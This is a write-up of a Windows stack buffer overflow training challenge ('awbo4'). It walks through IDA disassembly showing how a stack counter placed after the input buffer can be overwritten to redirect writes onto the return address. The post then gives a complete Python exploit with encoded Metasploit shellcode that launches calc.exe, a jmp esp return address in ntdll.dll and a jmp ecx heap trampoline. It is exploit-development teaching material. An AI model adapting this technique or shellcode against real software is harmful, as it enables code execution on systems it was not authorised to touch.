Advanced Windows Buffer Overflows - Take
Yet another warm summer day in the Basque Country and yet another refreshing take of VRT's very own
awbo
challenges. Today we will unveil a possible solutions for the 3rd test a.k.a. awbo4. The rules here remain the same as in the others: no NOP sleds, no static stack return addresses. If we feed the binary to IDA we will straightforwardly notice that the binary itself doesn't look too complex. In the main function it just calls one function at
0x00401050
which further analysis will show as a wrapper to read user input from stdin. I want to mention at this point that my lack of reversing skills got me stuck understanding how file input was read that I lost a couple of reversing sessions just doing so until finally olly's handle list enlightened me.
Once the input vector was clear, the first thing we notice is that the executable parses input to a fixed stack address until char 'A' is read. This seems like a pretty clear textbook example of a stack based buffer overflow, but unfortunately there's a little more voodoo involved than just that.
During execution there are essentially two counters involving the length of the input. The first one is placed inside a FILE-like structure which counts how many bytes are actually read from stdin, this input buffer is capped at a maximum of 4096 bytes and cannot be overflowed as so:
.text:00401570 lea eax, [ebp+NumberOfBytesRead]
.text:00401573 push 0 ; lpOverlapped
.text:00401575 push eax ; lpNumberOfBytesRead
.text:00401576 mov eax, [ebx]
.text:00401578 push [ebp+nNumberOfBytesToRead] ; 0x1000
.text:0040157B push ecx ; lpBuffer
.text:0040157C push dword ptr [eax+esi] ; hFile
.text:0040157F call ds:ReadFile
.text:00401585 test eax, eax
.text:00401587 jnz short readStuffThe second one is placed in the stack of the main function. It's a peculiar layout from what I encountered in the past. In this case the the local frame counter is placed after the buffer where we copy our input char-by-char. The funny fact is that at first look we can't write as much as we want because every loop the counter is AND'd with
0xFF.
But since devil's in the details, lets look at this:
.text:00401070 mov eax, [ebp-8] ; stack counter
.text:00401073 and eax, 0FFh
.text:00401078 mov cl, [ebp-4]
.text:0040107B mov [ebp+eax-88h], cl ; write into stack buffer
.text:00401082 mov dl, [ebp-8]
.text:00401085 add dl, 1
.text:00401088 mov [ebp-8], dl
.text:0040108B jmp short loopNotice here that even thought eax is capped at each iteration, it's then used as index to the stack buffer at
0x0040107B.
This leads to a interesting situation: we can smash the counter value to write our input wherever we want but, taking care of the value not being bigger than
0xFFbecause
otherwise it'll be clobbered.
Now that we understand the bug, let's move onto exploitation. There are 128 bytes from the beginning of our input up to the stack counter value. This value is stored as a 4-byte unsigned integer value but as the AND operation showed us, only the first byte is used. After this 4-byte value we find the return address. In my particular exploit I decided to put the shellcode and everything after the return address because althought we're really close to the top of the stack, we cannot overflow it in such a way to cause an access violation signal because the index we use to the stack buffer is just a byte long and doesn't allow writes past this boundary.
The trick I used here is that even thought we can't have our code in the stack, our whole input is stored in the memory heap. The rules say that we can't use hardcoded addresses but luck is with us this time. After returning from the main function ecx points towards the middle of our input in the heap (remember, we've just been processing it). In this situation, we will craft the exploit as follows:
# jmp ecx opcode
jmp_ecx = "\xFF\xE1"
# windows/exec - 148 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
shellcode ="\x31\xc9\xbf\xa3\xd2\x6a\x3d\xb1\x1f\xdd\xc7\xd9\x74\x24"
shellcode +="\xf4\x58\x31\x78\x0f\x83\xc0\x04\x03\x78\xa8\x30\x9f\xc1"
shellcode +="\x46\xf0\x60\x3a\x96\x72\x25\x06\x1d\xf8\xa3\x0e\x20\xee"
shellcode +="\x27\xa1\x3a\x7b\x68\x1e\x3b\x90\xde\xd5\x0f\xed\xe0\x07"
shellcode +="\x5e\x31\x7b\x7b\x24\x71\x08\x83\xe5\xb8\xfc\x8a\x27\xd7"
shellcode +="\x0b\xb7\xf3\x0c\xf0\xbd\x1e\xc7\xa7\x19\xe1\x33\x31\xe9"
shellcode +="\xed\x88\x35\xb2\xf1\x0f\xa1\xc6\x15\x9b\x34\x32\xac\xc7"
shellcode +="\x12\xc0\x6d\xa8\x6b\x3e\x11\x01\xe8\x35\x97\x9d\x7b\x09"
shellcode +="\x1b\x55\x0b\x96\x8e\xe2\x84\xae\x59\x0c\xd7\x6f\x33\xbd"
shellcode +="\xb0\x11\x1b\xdf\x32\x86\x03\xde\x3f\x58\x64\xe0\xa7\x06"
shellcode +="\xeb\x72\x4b\xe7\x8e\xf2\xee\xf7"
# return address of jmp esp in ntdll.dll : 0x78461BE3
ret = "\xE3\x1B\x46\x78"
# print everything so we can pipe it to our executable
print "B"*128+"\x88"+"C"*3+ret+jmp_ecx+"\x90"*50+shellcode+"A"As you can see, we will overwrite the counter value with
0x88
which will allow the next write to be performed beginning in main's return address and forwards. Once we return execution to the stack with the jmp esp instruction which we located inside ntdll.dll, we will assemble a jmp ecx instruction that as I said will land in the heap were our buffer remains untouched. Also notice the leading "A" which will tell the executable to stop reading user input and to exit. As always, shellcode has been borrowed from
Metasploit.com
and is just a simple calc.exe launcher. We can pop a nice calculator as follows:
$ ./exp.py | awbo4.exe